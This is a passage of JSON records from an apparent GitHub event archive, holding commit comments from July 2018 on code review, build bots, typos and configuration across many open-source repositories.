opencv.loadImage(video);\r\n\r\n  image(video, 0, 0 );\r\n\r\n  noFill();\r\n  stroke(0, 255, 0);\r\n  strokeWeight(2);\r\n  Rectangle[] faces = opencv.detect();\r\n  println(faces.length);  \r\n\r\n  for (int i = 0; i < faces.length; i++) {\r\n    //println(faces[i].x + \",\" + faces[i].y);\r\n    rect(faces[i].x, faces[i].y, faces[i].width, faces[i].height);\r\n    center_x = faces[i].x + (faces[i].width/2);   //起始點x + 0.5*寬\r\n    center_y = faces[i].y + (faces[i].height /2);  //起始點y + 0.5*高\r\n    print(center_x); \r\n    print(\", \"); \r\n    println(center_y);\r\n"}},"created_at":"2018-07-27T08:16:20Z"}
{"id":"8027213216","type":"CommitCommentEvent","actor":{"login":"Algent"},"repo":{"name":"weblue/weblue.github.io"},"payload":{"comment":{"id":29855431,"position":null,"line":null,"path":null,"commit_id":"84d513c7c0244ea582315877f3ffebef5979b91b","created_at":"2018-07-27T08:17:48Z","updated_at":"2018-07-27T08:17:48Z","author_association":"NONE","body":"SyntaxError: JSON.parse: bad control character in string literal at line 3621 column 183 of the JSON data"}},"created_at":"2018-07-27T08:17:48Z"}
{"id":"8027213650","type":"CommitCommentEvent","actor":{"login":"tbroyer"},"repo":{"name":"uber/AutoDispose"},"payload":{"comment":{"id":29855433,"position":16,"line":51,"path":"android/autodispose-android-archcomponents-test/build.gradle","commit_id":"bf057c4f0d88d996ba739438d2a40ae5af75ceed","created_at":"2018-07-27T08:17:54Z","updated_at":"2018-07-27T08:17:54Z","author_association":"NONE","body":"If you use the `net.ltgt.errorprone-javacplugin` plugin, then you should use its DSL, otherwise you'll have two `-Xplugin:ErrorProne` passed to JavaC (one from the plugin, without any other argument, the other from this line), and I have no idea what would be the behavior…\r\n\r\n```gradle\r\nimport net.ltgt.gradle.errorprone.javacplugin.CheckSeverity;\r\n\r\ntasks.withType(JavaCompile) {\r\n  options.errorprone {\r\n    check(\"NullAway\", CheckSeverity.ERROR)\r\n    option(\"NullAway:AnnotatedPackages\", \"com.uber\")\r\n    check(\"RestrictTo\", CheckSeverity.OFF)\r\n  }\r\n}\r\n```"}},"created_at":"2018-07-27T08:17:54Z"}
{"id":"8027218084","type":"CommitCommentEvent","actor":{"login":"R-Matsubayashi"},"repo":{"name":"Questetra/Addon-XML"},"payload":{"comment":{"id":29855440,"position":null,"line":null,"path":null,"commit_id":"07a30391a52cbf2bd6d11115952f12cc0223bf24","created_at":"2018-07-27T08:18:55Z","updated_at":"2018-07-27T08:18:55Z","author_association":"COLLABORATOR","body":"削除アドオンにはengine-typeを入れた、という変更もありました。"}},"created_at":"2018-07-27T08:18:55Z"}
{"id":"8027219782","type":"CommitCommentEvent","actor":{"login":"arvidn"},"repo":{"name":"arvidn/libtorrent"},"payload":{"comment":{"id":29855446,"position":null,"line":null,"path":null,"commit_id":"2f56fa6c3e0d29d9afd68a7437a02b950033d67b","created_at":"2018-07-27T08:19:20Z","updated_at":"2018-07-27T08:19:20Z","author_association":"OWNER","body":"not quite yet. I was trying to build the package yesterday, but I've been pretty busy. (and `aafigure` is a bit finicky wrt python versions, I only have one machine that can build packages right now it seems). I expect to release either tonight or this weekend."}},"created_at":"2018-07-27T08:19:20Z"}
{"id":"8027220395","type":"CommitCommentEvent","actor":{"login":"papr"},"repo":{"name":"pupil-labs/pupil"},"payload":{"comment":{"id":29855448,"position":10,"line":null,"path":"pupil_src/shared_modules/gaze_producers.py","commit_id":"7e6d631b65233e6d0bd1558f9c023ed02410f552","created_at":"2018-07-27T08:19:30Z","updated_at":"2018-07-27T08:19:30Z","author_association":"MEMBER","body":"What we actually have to check if there are sections that can be calibrated. Else this will automatically through errors at the user. "}},"created_at":"2018-07-27T08:19:30Z"}
{"id":"8027222035","type":"CommitCommentEvent","actor":{"login":"danihodovic"},"repo":{"name":"ambrosus/ambrosus-node"},"payload":{"comment":{"id":29855456,"position":82,"line":75,"path":"README.md","commit_id":"690f17dfb1f38d2323af427851d501720d9b2096","created_at":"2018-07-27T08:19:53Z","updated_at":"2018-07-27T08:19:53Z","author_association":"COLLABORATOR","body":"s/Finaly/Finally"}},"created_at":"2018-07-27T08:19:53Z"}
{"id":"8027223529","type":"CommitCommentEvent","actor":{"login":"emrysr"},"repo":{"name":"emrysr/teiglmair"},"payload":{"comment":{"id":29855459,"position":5,"line":5,"path":"README.md","commit_id":"1cd07f13f5a83d1257d70ea46599ed028bc3af30","created_at":"2018-07-27T08:20:13Z","updated_at":"2018-07-27T08:20:13Z","author_association":"OWNER","body":"teigl..... be di hwn i fod!!!????"}},"created_at":"2018-07-27T08:20:13Z"}
{"id":"8027223801","type":"CommitCommentEvent","actor":{"login":"danihodovic"},"repo":{"name":"ambrosus/ambrosus-node"},"payload":{"comment":{"id":29855460,"position":107,"line":99,"path":"README.md","commit_id":"690f17dfb1f38d2323af427851d501720d9b2096","created_at":"2018-07-27T08:20:17Z","updated_at":"2018-07-27T08:20:17Z","author_association":"COLLABORATOR","body":":+1: "}},"created_at":"2018-07-27T08:20:17Z"}
{"id":"8027225083","type":"CommitCommentEvent","actor":{"login":"danihodovic"},"repo":{"name":"ambrosus/ambrosus-node"},"payload":{"comment":{"id":29855462,"position":14,"line":14,"path":"config/production.js","commit_id":"690f17dfb1f38d2323af427851d501720d9b2096","created_at":"2018-07-27T08:20:36Z","updated_at":"2018-07-27T08:20:36Z","author_association":"COLLABORATOR","body":":clap: , I forgot about this file"}},"created_at":"2018-07-27T08:20:36Z"}
{"id":"8027226313","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29855465,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-27T08:20:53Z","updated_at":"2018-07-27T08:20:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T08:20:53Z"}
{"id":"8027233134","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29855477,"position":22,"line":134,"path":"src/pow_fpga_accel.c","commit_id":"27a31fd45bb964e2511712e8eee628d36282e4a7","created_at":"2018-07-27T08:22:27Z","updated_at":"2018-07-27T08:22:27Z","author_association":"NONE","body":"By the way, always use Github website to reply instead of email to eliminate data transmission."}},"created_at":"2018-07-27T08:22:27Z"}
{"id":"8027236071","type":"CommitCommentEvent","actor":{"login":"Rikk"},"repo":{"name":"arai-a/arai-a.github.io"},"payload":{"comment":{"id":29855482,"position":null,"line":null,"path":null,"commit_id":"fee21b5b60b9520283aba71767a0ca8d74f83c17","created_at":"2018-07-27T08:23:06Z","updated_at":"2018-07-27T08:23:06Z","author_association":"NONE","body":"Btw, won't you keep unmht.org? It is down for a long time, you know..."}},"created_at":"2018-07-27T08:23:06Z"}
{"id":"8027237184","type":"CommitCommentEvent","actor":{"login":"FlyRuningOstrich"},"repo":{"name":"KramKroc/eureka"},"payload":{"comment":{"id":29855485,"position":null,"line":null,"path":null,"commit_id":"899a6932d0051cc36f31dc1a3f664e8d6dd5ab60","created_at":"2018-07-27T08:23:21Z","updated_at":"2018-07-27T08:23:21Z","author_association":"NONE","body":"401 is mean no auth; so you should change this: \r\neureka:\r\n  client:\r\n    service-url:\r\n      defaultZone=http://${security.user.name}:${security.user.password}@${eureka.instance.hostname}:${server.port}/eureka/"}},"created_at":"2018-07-27T08:23:21Z"}
{"id":"8027239268","type":"CommitCommentEvent","actor":{"login":"arai-a"},"repo":{"name":"arai-a/arai-a.github.io"},"payload":{"comment":{"id":29855488,"position":null,"line":null,"path":null,"commit_id":"fee21b5b60b9520283aba71767a0ca8d74f83c17","created_at":"2018-07-27T08:23:51Z","updated_at":"2018-07-27T08:23:51Z","author_association":"OWNER","body":"I'm busy for other things now."}},"created_at":"2018-07-27T08:23:51Z"}
{"id":"8027239634","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29855489,"position":22,"line":134,"path":"src/pow_fpga_accel.c","commit_id":"27a31fd45bb964e2511712e8eee628d36282e4a7","created_at":"2018-07-27T08:23:56Z","updated_at":"2018-07-27T08:23:56Z","author_association":"NONE","body":"2673 trytes can be fitting in the combination of custom buffer and write system call effeciently."}},"created_at":"2018-07-27T08:23:56Z"}
{"id":"8027266193","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29855545,"position":null,"line":null,"path":null,"commit_id":"b863eb6e939cb9e11beb1e4136244250725d29a3","created_at":"2018-07-27T08:30:02Z","updated_at":"2018-07-27T08:30:02Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - Win64-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 1 test warnings)\n\nMessages:\n\n * 1 test had: EIO diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T08:30:02Z"}
{"id":"8027270350","type":"CommitCommentEvent","actor":{"login":"chibenwa"},"repo":{"name":"trantienduchn/james-project"},"payload":{"comment":{"id":29855556,"position":null,"line":null,"path":null,"commit_id":"1195319cc0171e2487c566e916f6973029994a34","created_at":"2018-07-27T08:30:53Z","updated_at":"2018-07-27T08:30:53Z","author_association":"NONE","body":"That becomes a different test.\r\n\r\nPlease note that we also need to know what happens when a node we have a connection to dies."}},"created_at":"2018-07-27T08:30:53Z"}
{"id":"8027271267","type":"CommitCommentEvent","actor":{"login":"KOLANICH"},"repo":{"name":"tqdm/tqdm"},"payload":{"comment":{"id":29855558,"position":null,"line":null,"path":null,"commit_id":"97a93932742db9e2c38672219a0aef8d1b3ad482","created_at":"2018-07-27T08:31:06Z","updated_at":"2018-07-27T08:31:06Z","author_association":"NONE","body":">Don't see how we could shorten the name without being vague.\r\n\r\nYou already shorten with being vague: `trange`, `tnrange`\r\n\r\nIMHO adding prefixes to functions is not a good idea.\r\n\r\n>Can't make default due to seemingly never resolvable warning (notebook frontends indistinguishable, as discussed in #443 (comment))\r\n\r\nAnyway, in most cases user needs the solution working for both notebooks and console. Warning is unneeded and harmful. Instead problem description should be put into the faq.\r\n\r\nBTW, the module doesn't go into a wheel."}},"created_at":"2018-07-27T08:31:06Z"}
{"id":"8027273515","type":"CommitCommentEvent","actor":{"login":"simllll"},"repo":{"name":"agenda/agenda"},"payload":{"comment":{"id":29855560,"position":null,"line":null,"path":null,"commit_id":"b811523e5245c0e6885f7a6257d3483435ae5210","created_at":"2018-07-27T08:31:33Z","updated_at":"2018-07-27T08:31:33Z","author_association":"NONE","body":"What does \"client.db()\" do? Which database is selected then?\r\nI cannot find any documentation about it:\r\nhttps://mongodb.github.io/node-mongodb-native/3.0/api/MongoClient.html\r\n\r\nThanks"}},"created_at":"2018-07-27T08:31:33Z"}
{"id":"8027274477","type":"CommitCommentEvent","actor":{"login":"MrPinkFr"},"repo":{"name":"MrPinkFr/hello-world"},"payload":{"comment":{"id":29855562,"position":null,"line":null,"path":null,"commit_id":"b4bb93443866aa45ba4371b2cd0f2ab46a025df3","created_at":"2018-07-27T08:31:47Z","updated_at":"2018-07-27T08:31:47Z","author_association":"OWNER","body":"Je reviens en arriere"}},"created_at":"2018-07-27T08:31:47Z"}
{"id":"8027277140","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29855570,"position":null,"line":null,"path":null,"commit_id":"3de45abcfb772f9b30059cdc941fb8c23a32cbee","created_at":"2018-07-27T08:32:23Z","updated_at":"2018-07-27T08:32:23Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180727-083223 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180727-083223\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-27T08:32:23Z"}
{"id":"8027278845","type":"CommitCommentEvent","actor":{"login":"wanghaiyun139"},"repo":{"name":"MS-CSE-GCR/CosmicadDetection-Keras-Tensorflow-FasterRCNN"},"payload":{"comment":{"id":29855578,"position":null,"line":null,"path":null,"commit_id":"00ce44fc89713c9cbd21ee9da76e397549735d5f","created_at":"2018-07-27T08:32:47Z","updated_at":"2018-07-27T08:32:47Z","author_association":"NONE","body":"作者能否提供一个联系方式以便进一步交流。"}},"created_at":"2018-07-27T08:32:47Z"}
{"id":"8027278917","type":"CommitCommentEvent","actor":{"login":"anuraaga"},"repo":{"name":"line/armeria"},"payload":{"comment":{"id":29855579,"position":41,"line":183,"path":"grpc/src/main/java/com/linecorp/armeria/internal/grpc/HttpStreamReader.java","commit_id":"dd026c36e95ef59b6f9dc5f0935fa181928ed628","created_at":"2018-07-27T08:32:48Z","updated_at":"2018-07-27T08:32:48Z","author_association":"COLLABORATOR","body":"I think we want to `closeDeframer` in either case."}},"created_at":"2018-07-27T08:32:48Z"}
{"id":"8027281158","type":"CommitCommentEvent","actor":{"login":"anuraaga"},"repo":{"name":"line/armeria"},"payload":{"comment":{"id":29855587,"position":17,"line":174,"path":"grpc/src/main/java/com/linecorp/armeria/client/grpc/ArmeriaClientCall.java","commit_id":"dd026c36e95ef59b6f9dc5f0935fa181928ed628","created_at":"2018-07-27T08:33:19Z","updated_at":"2018-07-27T08:33:19Z","author_association":"COLLABORATOR","body":"Is it possible to improve the stream logic? It seems quite weird to have `onComplete` / `onError` but still need to use `completionFuture` instead."}},"created_at":"2018-07-27T08:33:19Z"}
{"id":"8027283402","type":"CommitCommentEvent","actor":{"login":"wanghaiyun139"},"repo":{"name":"THULiusj/CosmicadDetection-Keras-Tensorflow-FasterRCNN"},"payload":{"comment":{"id":29855589,"position":null,"line":null,"path":null,"commit_id":"db219e087e2053b6d4c06ca458f20c7c1ef5890d","created_at":"2018-07-27T08:33:49Z","updated_at":"2018-07-27T08:33:49Z","author_association":"NONE","body":"作者能否提供一个联系方式以便进一步交流。"}},"created_at":"2018-07-27T08:33:49Z"}
{"id":"8027284333","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29855592,"position":null,"line":null,"path":null,"commit_id":"ff925cecd7ec93407023fd9654957c999de04871","created_at":"2018-07-27T08:34:02Z","updated_at":"2018-07-27T08:34:02Z","author_association":"NONE","body":"Are you sure your algorithm is correct?\r\nIn line 276 c is calculated and used as index into array ndis:\r\n```\r\nint c = distance<Rank>(x, y) + distance<File>(x, y);\r\nint d = ndis[c];\r\n```\r\nc can be have a maximum of 14 but the ndis array has a size of 64. Why?\r\n"}},"created_at":"2018-07-27T08:34:02Z"}
{"id":"8027292279","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29855617,"position":null,"line":null,"path":null,"commit_id":"30c2c454c36a33ca351d9f717a29210b25671bd4","created_at":"2018-07-27T08:35:50Z","updated_at":"2018-07-27T08:35:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T08:35:50Z"}
{"id":"8027293518","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29855622,"position":null,"line":null,"path":null,"commit_id":"818fc656a9fac8c50a0add9cedc2be83a7c15284","created_at":"2018-07-27T08:36:06Z","updated_at":"2018-07-27T08:36:06Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180727-083605 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180727-083605\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-27T08:36:06Z"}
{"id":"8027303788","type":"CommitCommentEvent","actor":{"login":"nicklockwood"},"repo":{"name":"nicklockwood/SwiftFormat"},"payload":{"comment":{"id":29855650,"position":null,"line":null,"path":null,"commit_id":"3173c425c322efa40760b6c339a13bdeaf80aa52","created_at":"2018-07-27T08:38:21Z","updated_at":"2018-07-27T08:38:21Z","author_association":"OWNER","body":"@VinceBurn thank you, and thanks again for all your work on this feature. "}},"created_at":"2018-07-27T08:38:21Z"}
{"id":"8027304738","type":"CommitCommentEvent","actor":{"login":"Jekaa"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29855654,"position":null,"line":null,"path":null,"commit_id":"ff925cecd7ec93407023fd9654957c999de04871","created_at":"2018-07-27T08:38:35Z","updated_at":"2018-07-27T08:38:35Z","author_association":"OWNER","body":"yes, \r\n`int c = 8 * distance<Rank>(x, y) + distance<File>(x, y);`\r\nis correct"}},"created_at":"2018-07-27T08:38:35Z"}
{"id":"8027309300","type":"CommitCommentEvent","actor":{"login":"trustin"},"repo":{"name":"line/armeria"},"payload":{"comment":{"id":29855672,"position":17,"line":174,"path":"grpc/src/main/java/com/linecorp/armeria/client/grpc/ArmeriaClientCall.java","commit_id":"dd026c36e95ef59b6f9dc5f0935fa181928ed628","created_at":"2018-07-27T08:39:35Z","updated_at":"2018-07-27T08:39:35Z","author_association":"MEMBER","body":"This was necessary because `Subscription.cancel()` will trigger neither `onComplete()` nor `onError()` by specification. I thought I filed an issue about this but can't find it now."}},"created_at":"2018-07-27T08:39:35Z"}
{"id":"8027311689","type":"CommitCommentEvent","actor":{"login":"prplz"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":29855679,"position":null,"line":null,"path":null,"commit_id":"73b214a51571490249c92b8518758d66c8983743","created_at":"2018-07-27T08:40:04Z","updated_at":"2018-07-27T08:40:04Z","author_association":"CONTRIBUTOR","body":"Sorry, I've thought of this mistake a few times and never made the effort to submit a fix"}},"created_at":"2018-07-27T08:40:04Z"}
{"id":"8027311892","type":"CommitCommentEvent","actor":{"login":"carusogabriel"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29855681,"position":5,"line":10,"path":"ext/opcache/tests/bug76275.phpt","commit_id":"7ec64a831d861a8a17ec40a46f6ae985769cc77f","created_at":"2018-07-27T08:40:06Z","updated_at":"2018-07-27T08:40:06Z","author_association":"CONTRIBUTOR","body":"Gonna revert this change than, sorry!"}},"created_at":"2018-07-27T08:40:06Z"}
{"id":"8027314505","type":"CommitCommentEvent","actor":{"login":"Academy666"},"repo":{"name":"Academy666/10_skills_of_future"},"payload":{"comment":{"id":29855685,"position":null,"line":null,"path":null,"commit_id":"8553d6cbc6845b9d674ea8417096c0b9f1ba5785","created_at":"2018-07-27T08:40:39Z","updated_at":"2018-07-27T08:40:39Z","author_association":"OWNER","body":"Всё действительно ок."}},"created_at":"2018-07-27T08:40:39Z"}
{"id":"8027315514","type":"CommitCommentEvent","actor":{"login":"311devs"},"repo":{"name":"vonafor/tarantool-token-bucket"},"payload":{"comment":{"id":29855692,"position":null,"line":null,"path":null,"commit_id":"96c6b87a72147079e7ab8f775d3200d9c4a805f3","created_at":"2018-07-27T08:40:52Z","updated_at":"2018-07-27T08:40:52Z","author_association":"NONE","body":"норм"}},"created_at":"2018-07-27T08:40:52Z"}
{"id":"8027316076","type":"CommitCommentEvent","actor":{"login":"trustin"},"repo":{"name":"line/armeria"},"payload":{"comment":{"id":29855697,"position":41,"line":183,"path":"grpc/src/main/java/com/linecorp/armeria/internal/grpc/HttpStreamReader.java","commit_id":"dd026c36e95ef59b6f9dc5f0935fa181928ed628","created_at":"2018-07-27T08:41:00Z","updated_at":"2018-07-27T08:41:00Z","author_association":"MEMBER","body":"Fixed"}},"created_at":"2018-07-27T08:41:00Z"}
{"id":"8027318087","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29855703,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-27T08:41:27Z","updated_at":"2018-07-27T08:41:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T08:41:27Z"}
{"id":"8027321970","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29855711,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-27T08:42:17Z","updated_at":"2018-07-27T08:42:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-27T08:42:17Z"}
{"id":"8027325727","type":"CommitCommentEvent","actor":{"login":"allmaxgit"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29855716,"position":4,"line":195,"path":"Libraries/Components/TextInput/TextInput.js","commit_id":"a275eac56e21b8f3631bcd03ace86c07a3b0c0ba","created_at":"2018-07-27T08:43:04Z","updated_at":"2018-07-27T08:43:04Z","author_association":"NONE","body":"How now get currentlyFocusedField?"}},"created_at":"2018-07-27T08:43:04Z"}
{"id":"8027332147","type":"CommitCommentEvent","actor":{"login":"Freezystem"},"repo":{"name":"ghiden/angucomplete-alt"},"payload":{"comment":{"id":29855727,"position":4,"line":596,"path":"angucomplete-alt.js","commit_id":"02ffc620e835691ba4ad2a725ab89ead2a884df3","created_at":"2018-07-27T08:44:26Z","updated_at":"2018-07-27T08:44:26Z","author_association":"CONTRIBUTOR","body":"😄 you're certainly right but I'm not doing angular anymore so maybe you can make a PR to fix this issue."}},"created_at":"2018-07-27T08:44:26Z"}
{"id":"8027334720","type":"CommitCommentEvent","actor":{"login":"Mr-Rm"},"repo":{"name":"EvilBeaver/OneScript"},"payload":{"comment":{"id":29855733,"position":104,"line":103,"path":"src/ScriptEngine/Machine/TypeFactory.cs","commit_id":"f9a113adc9488fcca10813123b24ad4b21ddfb83","created_at":"2018-07-27T08:45:01Z","updated_at":"2018-07-27T08:45:01Z","author_association":"CONTRIBUTOR","body":"Замена на\r\n`.Where(x => x.GetCustomAttributes(typeof(ScriptConstructorAttribute),false).Any()`\r\nдаст ещё полпроцента скорости."}},"created_at":"2018-07-27T08:45:01Z"}
{"id":"8027340745","type":"CommitCommentEvent","actor":{"login":"KABBOUCHI"},"repo":{"name":"KABBOUCHI/laravel-logger-discord-channel"},"payload":{"comment":{"id":29855742,"position":6,"line":21,"path":"README.md","commit_id":"dd9cf2c67bb70e60a668e956951bfa1812246cfb","created_at":"2018-07-27T08:46:20Z","updated_at":"2018-07-27T08:46:20Z","author_association":"OWNER","body":"thx, fixed it\r\n\r\nhttps://github.com/KABBOUCHI/laravel-logger-discord-channel/commit/3917c0d75202a3f8032d0e873b78839cfc780a7a"}},"created_at":"2018-07-27T08:46:20Z"}
{"id":"8027341655","type":"CommitCommentEvent","actor":{"login":"zhouyoufu"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29855744,"position":6,"line":6,"path":"topics/3d/3d.md","commit_id":"6c6508f34230f0ac0d49e847a326429eefbfc030","created_at":"2018-07-27T08:46:32Z","updated_at":"2018-07-27T08:46:32Z","author_association":"NONE","body":"I"}},"created_at":"2018-07-27T08:46:32Z"}
{"id":"8027341823","type":"CommitCommentEvent","actor":{"login":"stephenandrews"},"repo":{"name":"bakechain/bakechain"},"payload":{"comment":{"id":29855745,"position":null,"line":null,"path":null,"commit_id":"6eeed3091b3927b6148f10ecc858f0604a131851","created_at":"2018-07-27T08:46:35Z","updated_at":"2018-07-27T08:46:35Z","author_association":"CONTRIBUTOR","body":"Please use version 0.3.0"}},"created_at":"2018-07-27T08:46:35Z"}
{"id":"8027342177","type":"CommitCommentEvent","actor":{"login":"prabhu9989125"},"repo":{"name":"prabhu9989125/resume1"},"payload":{"comment":{"id":29855747,"position":null,"line":null,"path":null,"commit_id":"6d4c5eede7a6b7a3ced38e48c846909d3f827294","created_at":"2018-07-27T08:46:40Z","updated_at":"2018-07-27T08:46:40Z","author_association":"OWNER","body":"details\r\n"}},"created_at":"2018-07-27T08:46:40Z"}
{"id":"8027342431","type":"CommitCommentEvent","actor":{"login":"arthurmak"},"repo":{"name":"erc721-class/student-list"},"payload":{"comment":{"id":29855749,"position":null,"line":null,"path":null,"commit_id":"80a27467a42780a5dc09ac6b513e187fc5b4dab1","created_at":"2018-07-27T08:46:43Z","updated_at":"2018-07-27T08:46:43Z","author_association":"NONE","body":"Arthur Mak"}},"created_at":"2018-07-27T08:46:43Z"}
{"id":"8027342948","type":"CommitCommentEvent","actor":{"login":"cniry"},"repo":{"name":"nette/forms"},"payload":{"comment":{"id":29855751,"position":8,"line":460,"path":"src/assets/netteForms.js","commit_id":"e3b5529bea856b4a67d8538d1fb1b25955015820","created_at":"2018-07-27T08:46:50Z","updated_at":"2018-07-27T08:46:50Z","author_association":"NONE","body":"global variable?"}},"created_at":"2018-07-27T08:46:50Z"}
